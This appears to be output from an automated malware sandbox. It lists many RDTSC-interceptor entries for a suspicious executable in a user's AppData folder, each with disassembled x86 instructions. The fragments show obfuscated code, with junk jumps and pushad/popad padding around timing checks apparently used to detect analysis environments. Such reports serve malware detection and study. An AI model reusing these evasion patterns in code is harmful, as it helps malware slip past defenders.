Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E8029E second address: 4E802A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E802A4 second address: 4E80302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007F0E948C9FC6h 0x00000011 popad 0x00000012 and dword ptr [eax], 00000000h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBAh 0x0000001c sbb eax, 2055C2A8h 0x00000022 jmp 00007F0E948C9FBBh 0x00000027 popfd 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b and dword ptr [eax+04h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E948C9FC1h 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605B9 second address: 4E605BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605BD second address: 4E605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605C1 second address: 4E605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605C7 second address: 4E605CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605CD second address: 4E605D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605D1 second address: 4E605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E948C9FC2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605F0 second address: 4E605F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605F4 second address: 4E605FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E605FA second address: 4E6065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0E94F51A52h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F0E94F51A50h 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0E94F51A50h 0x0000001f pop ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov dh, al 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 call 00007F0E94F51A55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70C81 second address: 4E70C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70C93 second address: 4E70C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70C97 second address: 4E70CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E948C9FBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70CBD second address: 4E70CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E70CCC second address: 4E70D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 jmp 00007F0E948C9FC8h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E80068 second address: 4E80080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A54h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E80080 second address: 4E800E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 69104580h 0x00000010 jmp 00007F0E948C9FC9h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0E948C9FC3h 0x00000020 and eax, 38C36A0Eh 0x00000026 jmp 00007F0E948C9FC9h 0x0000002b popfd 0x0000002c mov ah, A3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E800E5 second address: 4E800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E800EB second address: 4E800EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0624 second address: 4EA0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0649 second address: 4EA0707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 xor al, 0000007Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a mov eax, edi 0x0000001c pop edi 0x0000001d mov di, si 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F0E948C9FBAh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov bx, 06C0h 0x0000002e popad 0x0000002f push ecx 0x00000030 jmp 00007F0E948C9FC4h 0x00000035 mov dword ptr [esp], ecx 0x00000038 pushad 0x00000039 movzx esi, di 0x0000003c pushfd 0x0000003d jmp 00007F0E948C9FC3h 0x00000042 adc cx, 1D4Eh 0x00000047 jmp 00007F0E948C9FC9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [76FA65FCh] 0x00000053 pushad 0x00000054 call 00007F0E948C9FBCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0707 second address: 4EA077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E94F51A51h 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007F0E94F51A4Eh 0x00000012 je 00007F0F06FD4C7Eh 0x00000018 pushad 0x00000019 jmp 00007F0E94F51A4Eh 0x0000001e pushad 0x0000001f mov dx, cx 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 popad 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a pushad 0x0000002b mov cx, di 0x0000002e jmp 00007F0E94F51A57h 0x00000033 popad 0x00000034 mov si, 95EFh 0x00000038 popad 0x00000039 xor eax, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ebx 0x00000041 mov ah, D8h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA077B second address: 4EA0842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d mov dl, ah 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 jmp 00007F0E948C9FC3h 0x0000001a popfd 0x0000001b popad 0x0000001c ror eax, cl 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E948C9FC4h 0x00000025 add esi, 5147D008h 0x0000002b jmp 00007F0E948C9FBBh 0x00000030 popfd 0x00000031 jmp 00007F0E948C9FC8h 0x00000036 popad 0x00000037 leave 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F0E948C9FBEh 0x0000003f add esi, 5754C598h 0x00000045 jmp 00007F0E948C9FBBh 0x0000004a popfd 0x0000004b mov dx, si 0x0000004e popad 0x0000004f retn 0004h 0x00000052 nop 0x00000053 mov esi, eax 0x00000055 lea eax, dword ptr [ebp-08h] 0x00000058 xor esi, dword ptr [00AB2014h] 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 lea eax, dword ptr [ebp-10h] 0x00000064 push eax 0x00000065 call 00007F0E98CFA7F3h 0x0000006a push FFFFFFFEh 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F0E948C9FC1h 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0842 second address: 4EA0867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0867 second address: 4EA0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F0E98CFA831h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E948C9FC0h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0886 second address: 4EA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA0898 second address: 4EA089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4EA089C second address: 4EA08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E94F51A53h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5002E second address: 4E500AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 and ch, 0000000Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC0h 0x00000018 sub ax, 1388h 0x0000001d jmp 00007F0E948C9FBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F0E948C9FBAh 0x00000036 jmp 00007F0E948C9FC5h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E500AE second address: 4E5013B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 6E5055D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F0E94F51A58h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dx, ax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 and ax, 2DD8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 jmp 00007F0E94F51A58h 0x00000035 popad 0x00000036 popad 0x00000037 and esp, FFFFFFF8h 0x0000003a jmp 00007F0E94F51A50h 0x0000003f xchg eax, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov edi, 0C56B380h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5013B second address: 4E50141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50141 second address: 4E50145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50145 second address: 4E50162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50162 second address: 4E50168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50168 second address: 4E5016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5016C second address: 4E5017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5017B second address: 4E50181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50181 second address: 4E501DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F0E94F51A50h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0E94F51A57h 0x00000019 add ecx, 2B0072CEh 0x0000001f jmp 00007F0E94F51A59h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E501DE second address: 4E501FD instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E948C9FC0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E501FD second address: 4E50203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50203 second address: 4E5023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 or ax, 1F16h 0x00000019 jmp 00007F0E948C9FC1h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5037C second address: 4E50383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50383 second address: 4E503FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 408Bh 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC5h 0x00000018 sbb si, 6786h 0x0000001d jmp 00007F0E948C9FC1h 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007F0F06998208h 0x0000002a jmp 00007F0E948C9FBEh 0x0000002f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000036 jmp 00007F0E948C9FC0h 0x0000003b je 00007F0F069981F3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E503FA second address: 4E503FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E503FE second address: 4E50404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50404 second address: 4E5044E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F0E94F51A50h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F0E94F51A50h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E5044E second address: 4E50452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E50452 second address: 4E50458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E408B1 second address: 4E408EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC4h 0x00000014 jmp 00007F0E948C9FC5h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E408EA second address: 4E40939 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E94F51A50h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bx, 8E66h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Ch 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f add ch, FFFFFFC6h 0x00000022 jmp 00007F0E94F51A51h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40939 second address: 4E4094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E4094D second address: 4E40960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40AE2 second address: 4E40B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 je 00007F0F0699F84Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0E948C9FC7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40B2E second address: 4E40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0E94F51A4Ch 0x00000017 sbb ch, FFFFFFD8h 0x0000001a jmp 00007F0E94F51A4Bh 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 jne 00007F0F0702728Ah 0x00000029 pushad 0x0000002a push esi 0x0000002b mov bl, 80h 0x0000002d pop esi 0x0000002e popad 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F0E94F51A4Bh 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edx, ax 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40B96 second address: 4E40B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40B9C second address: 4E40BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40BAB second address: 4E40BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40BAF second address: 4E40BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40BC2 second address: 4E40BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, CFBEh 0x00000011 jmp 00007F0E948C9FBFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40CF9 second address: 4E40D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D09 second address: 4E40D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D0D second address: 4E40D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F0E94F51A57h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D34 second address: 4E40D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D38 second address: 4E40D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D53 second address: 4E40D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: 4E40D59 second address: 4E40D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
